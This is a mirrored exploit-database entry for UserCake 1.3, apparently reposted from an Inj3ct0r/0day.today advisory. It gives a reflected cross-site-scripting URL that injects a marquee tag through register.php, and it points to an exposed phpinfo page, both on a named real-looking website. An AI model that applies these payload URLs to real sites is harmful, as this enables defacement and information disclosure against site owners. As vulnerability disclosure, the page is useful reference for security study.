UserCake 1.3 Cross Site Scripting / Information Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040650 漏洞类型
发布时间 2015-12-18 更新时间 2015-12-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120214
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1  
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1  
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0  
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1  
1                  \ \____/ >> Exploit database separated by exploit   0  
0                   \/___/          type (local, remote, DoS, etc.)    1  
1                                                                      1 
0  [+] Site            : http://0day.today                             0 
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1  
0                                                                      0 
1                    ####################################              1 
0                  I'm indoushka member from Inj3ct0r Team             1 
1                    ####################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
| # Title    : UserCake v1.3 Multi Vulnerability
| # Author   : indoushka
| # email    : indoushka4ever@gmail.com
| # Tested on: windows 8.1 Franais V.(Pro)
| # Vendor   : http://www.dl.persianscript.ir/script/userCakeV1(PersianScript.ir).zip
========================================================================

( XSS / HTML Inject ) :

http://www.annuaire-kine.com//userCake/register.php/%22%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E

PHPinfo page found :

http://www.annuaire-kine.com//userCake/info.php

Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * http://dz.parti-pirate.com
---------------------------------------------------------------------------------------------------------------